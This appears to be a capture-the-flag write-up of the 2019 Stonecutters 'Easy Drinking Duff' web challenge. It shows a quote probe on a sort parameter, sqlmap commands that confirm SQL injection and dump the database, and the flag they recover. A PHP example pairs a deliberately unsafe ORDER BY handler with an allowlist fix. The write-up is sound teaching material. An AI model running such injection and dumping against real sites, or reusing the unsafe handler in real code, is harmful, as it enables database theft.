2019 Stonecutters - Easy Drinking Duff

Easy Drinking Duff was the first and easiest web app challenge that the Stonecutters had on the board. By the time I got around to it, it was only worth 75 points and it had the most solves of all the web app challenges.

In order to access the challenge, I needed to register my SSH key with the scoring server and run a provided SSH command to access the challenge. I was then able to load the following site by pointing my browser to 127.0.0.1:8080:

[Screenshot: the Easy Drinking Duff site]

I then sorted the data set by year by clicking on the "Year" column header which sent a request for: http://127.0.0.1:8080/index.php?s=year

This just screamed database, so I entered a ' at the end of year to see what would happen and I saw the following error message:

[Screenshot: SQL Error]

This indicated a SQLi vulnerability so I ran sqlmap, as seen below, to validate the finding by checking who the current-user was:

# sqlmap -u "127.0.0.1:8080/index.php?s=year*" --current-user
<snip>
[13:57:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.3
back-end DBMS: MySQL >= 5.0
[13:57:38] [INFO] fetching current user
[13:57:38] [INFO] retrieved: ctf@localhost
current user: 'ctf@localhost'
[13:57:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'

As the injection vulnerability was confirmed, I then ran sqlmap again with the -a option so I could check for flags:

# sqlmap -u "127.0.0.1:8080/index.php?s=year*" -a
<snip>
[13:58:11] [INFO] retrieved: Artist Test
[13:58:11] [INFO] retrieved: 0
[13:58:11] [INFO] retrieved: flag{OttoMannWasHere}
<snip>
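The root cause behind that "SQL Error" is a sort parameter dropped straight into ORDER BY. The following is an added example, not the challenge's own source (which the write-up does not show): a sort handler in the style of index.php?s=year with the unsafe concatenation beside an allowlist fix. It assumes an in-memory SQLite database via PDO (so it runs without MySQL) and a hypothetical beers table with name, brewery and year columns.

```php
<?php
// Added example, not code from the challenge. Table and column names are
// assumptions; SQLite via PDO stands in for the challenge's MySQL backend.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE beers (name TEXT, brewery TEXT, year INTEGER)');
$pdo->exec("INSERT INTO beers VALUES ('Duff', 'Duff Brewery', 1989),
                                     ('Duff Lite', 'Duff Brewery', 1996)");

// Vulnerable: the request value lands in ORDER BY unchanged, so a trailing
// quote (s=year') breaks the statement and the database error reaches the
// page. Prepared statements do not help here: identifiers in ORDER BY
// cannot be bound as parameters, only literal values can.
function sortUnsafe(PDO $pdo, string $sort): array {
    $stmt = $pdo->query("SELECT name, year FROM beers ORDER BY " . $sort);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: map the request value onto a fixed set of column names and
// refuse anything else, so only a known identifier ever reaches the SQL.
function sortSafe(PDO $pdo, string $sort): array {
    $columns = ['name' => 'name', 'brewery' => 'brewery', 'year' => 'year'];
    if (!array_key_exists($sort, $columns)) {
        throw new InvalidArgumentException('unknown sort column');
    }
    $stmt = $pdo->query("SELECT name, year FROM beers ORDER BY " . $columns[$sort]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: the legitimate sort and the probe from the write-up.
foreach (['year', "year'"] as $s) {
    try {
        echo "unsafe s=$s: " . count(sortUnsafe($pdo, $s)) . " rows\n";
    } catch (PDOException $e) {
        // This is the message a real app would leak as "SQL Error".
        echo "unsafe s=$s: database error: " . $e->getMessage() . "\n";
    }
    try {
        echo "safe   s=$s: " . count(sortSafe($pdo, $s)) . " rows\n";
    } catch (InvalidArgumentException $e) {
        // Rejected before any SQL is built; respond with a generic 400.
        echo "safe   s=$s: rejected, no query executed\n";
    }
}
```

In a real handler the InvalidArgumentException branch should return a generic 400 response rather than any database error text, which is also what removes the error-based signal sqlmap keyed on above.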

That was it for this challenge. I'm excited to share the rest of my write-ups when I'm allowed. Rumor has it that the Stonecutters will release new challenges relatively soon. This means I should get the green-light to post my other write-ups shortly thereafter.

Thanks for your patience!

The rest of the challenges can be found here:
https://blog.welcomethrill.house/2019/01/code-name-2019-stonecutters-ctf.html

-strupo_
